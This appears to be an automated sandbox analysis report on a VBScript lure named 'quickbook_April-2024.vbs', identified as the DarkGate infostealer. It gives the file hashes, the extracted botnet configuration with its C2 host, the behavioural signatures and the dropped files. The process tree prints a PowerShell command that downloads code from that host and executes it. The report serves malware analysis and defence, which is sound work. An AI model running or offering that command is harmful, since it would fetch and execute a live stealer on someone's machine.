Overview

overview

10

Static

static

1

quickbook_...24.vbs

windows7-x64

3

quickbook_...24.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-04-2024 16:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    quickbook_April-2024.vbs

  • Size

    7KB

  • MD5

    4ff404ceede30c0ca73b97e26f20dfa8

  • SHA1

    5b2644004b27a4b39502ad0d4a0193d0124588cb

  • SHA256

    885eae8e4d2788a7c54f4123cbf84b4e897082f8388a7b3f3c2bace9f9419e13

  • SHA512

    4f8fbfb0dea83b81fcaff17cd4fea7cf888a99b186908f58b4b2d599b4a4f3df9bd9a8fadec7b25de5dea4dfaf416dca09ce6ce76a542ad32f0a96febe836ae1

  • SSDEEP

    192:YMg119gkCtL3IqSPN3QzGNzUoNJnN/Y999E6:jy19gR3IquNgzG2oNla

Score
10/10
darkgateadmin888stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

31yc.com

Attributes
  • anti_analysis

    true

  • anti_debug

    false

  • anti_vm

    true

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    gWZTZaEo

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    admin888

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

    stealerdarkgate
  • Detect DarkGate stealer 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\quickbook_April-2024.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '31yc.com/gcwkaqrq')
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5008
      • C:\ggrs\KeyScramblerLogon.exe
        "C:\ggrs\KeyScramblerLogon.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:4980
      • C:\Windows\system32\attrib.exe
        "C:\Windows\system32\attrib.exe" +h C:/ggrs/
        3⤵
        • Views/modifies file attributes
        PID:2072

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wzhihnoq.jvg.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\ggrs\KeyScramblerIE.dll
    Filesize

    2.1MB

    MD5

    85e8143ef1b400569ec5479b72a405fc

    SHA1

    2326402a4972b1e6ec6dafd8db037f25ce908844

    SHA256

    09b00a21a6fbe6922967113531f102f406a2ccb1693c2b0587b9cdd8639ef312

    SHA512

    d0bf352275ff086260f3feedd910b664177538c08a9b986b938d44f2105aac82f56de82670a3d6935e513d77e1dbd823b771f8a62a0eeb7b43d455d73a1d476a

    Download Submit

  • C:\ggrs\KeyScramblerLogon.exe
    Filesize

    500KB

    MD5

    c790ebfcb6a34953a371e32c9174fe46

    SHA1

    3ead08d8bbdb3afd851877cb50507b77ae18a4d8

    SHA256

    fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

    SHA512

    74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    Download Submit

  • C:\ggrs\test.txt
    Filesize

    457KB

    MD5

    a96c1c7d3b42de72af043728028a6536

    SHA1

    d646d9d9d0d53763ba0bb78f836a1c8733d89114

    SHA256

    02e931975c0288baf5c6aa3a5f3ac2462cb46e8c694f03fc49a64408d047a94a

    SHA512

    2f084d924ffd7e76abe5e371b3bfc80cb53304deb8b068a370bf4d77afd8a9074058c438149c822e0c99a76d526b84d56f25a9ce5074241863b13216df45f9df

    Download Submit

  • memory/4980-38-0x0000000001270000-0x0000000001485000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/4980-44-0x0000000002E00000-0x0000000002E73000-memory.dmp

    Filesize

    460KB

    Download

  • memory/4980-43-0x0000000001270000-0x0000000001485000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/4980-41-0x0000000002E00000-0x0000000002E73000-memory.dmp

    Filesize

    460KB

    Download

  • memory/5008-11-0x0000024256810000-0x0000024256820000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5008-39-0x00007FFBD9ED0000-0x00007FFBDA991000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5008-13-0x0000024271770000-0x0000024271932000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/5008-12-0x0000024256810000-0x0000024256820000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5008-5-0x00000242568F0000-0x0000024256912000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5008-10-0x00007FFBD9ED0000-0x00007FFBDA991000-memory.dmp

    Filesize

    10.8MB

    Download